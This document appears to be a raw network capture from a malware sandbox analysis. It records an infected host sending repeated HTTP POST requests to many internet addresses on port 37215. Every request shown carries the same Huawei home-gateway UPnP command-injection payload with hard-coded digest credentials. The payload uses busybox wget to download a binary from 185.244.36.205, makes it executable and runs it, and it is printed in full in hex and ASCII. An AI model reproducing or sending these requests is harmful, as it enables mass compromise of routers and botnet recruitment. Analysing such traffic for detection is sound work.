                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2382192.168.2.1546098121.159.131.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473395109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2383192.168.2.1550166121.120.35.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473476887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2384192.168.2.153949445.175.47.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473509073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2385192.168.2.1554682190.16.62.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473572969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2386192.168.2.1542438222.70.160.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473617077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2387192.168.2.1545420121.133.212.12637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473620892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2388192.168.2.1556068156.97.51.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473642111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2389192.168.2.153366094.9.100.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473653078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2390192.168.2.1543294181.123.25.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473670959 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2391192.168.2.1550356121.145.179.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.473689079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
